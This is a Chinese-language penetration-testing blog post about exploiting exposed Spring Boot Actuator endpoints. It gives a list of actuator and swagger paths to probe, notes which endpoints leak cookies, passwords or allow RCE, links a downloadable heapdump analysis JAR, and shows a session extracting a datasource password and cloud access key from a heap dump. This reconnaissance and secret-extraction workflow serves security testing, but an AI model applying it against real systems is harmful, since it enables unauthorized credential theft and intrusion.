在某次項目當(dāng)中發(fā)現(xiàn)了一個spring boot的heapdump泄露，無法使用常見的mat分析工具打開。在逛github的時候發(fā)現(xiàn)了一個比較好的工具，可對該heapdump提取密碼，并且該工具的其他功能比較新穎，打開了heapdump的新玩法。

下載地址：https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20230406/heapdump_tool.jar

java -jar heapdump_tool.jar

路由列表

/api-docs
/v2/api-docs
/swagger-ui.html
/api.html
/sw/swagger-ui.html
/api/swagger-ui.html
/template/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
/mappings
/actuator/mappings
/metrics
/actuator/metrics
/beans
/actuator/beans
/configprops
/actuator/configprops
/actuator
/auditevents
/autoconfig
/caches
/conditions
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/health
/actuator/conditions
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/scheduledtasks
/actuator/httptrace
/actuator/jolokia
/actuator/hystrix.stream

/trace：顯示最近的http包信息，可能泄露當(dāng)前系統(tǒng)存活的Cookie信息。
/env：應(yīng)用的環(huán)境信息，包含Profile、系統(tǒng)環(huán)境變量和應(yīng)用的properties信息，可能泄露明文密碼與接口信息。
/jolokia：RCE漏洞
/heapdump：JVM內(nèi)存信息，分析出明文密碼

下載heapdump

root@wy:~# 
> java -jar heapdump_tool.jar  heapdump.6
[-] file: heapdump.6
[-] Start jhat, waiting...
[-] get objects,waiting(1-2min)...
[-] fing object count: 113128
[-] please input keyword value to search, example: password,len=16,num=0-10,all=true,geturl,getfile,getip input q/quit to quit.
> spring.datasource.password
[-] Start find keyword: spring.datasource.password
>> spring.datasource.password -> test@wyzxxz 
[-] please input keyword value to search, example: password,len=16,num=0-10,all=true,geturl,getfile,getip input q/quit to quit.
> accesskey
[-] Start find keyword: accessKey
>> ConnectionProperties.noAccessToProcedureBodies -> When determining procedure parameter types for CallableStatements, and the connected user can''t access procedure bodies through "SHOW CREATE PROCEDURE" or select on mysql.proc should the driver instead create basic metadata
>> accessKey -> LTA**************
[-] please input keyword value to search, example: password,len=16,num=0-10,all=true,geturl,getfile,getip input q/quit to quit.
> q
[-] exit.

引用

https://blog.csdn.net/weixin_44309905/article/details/127279561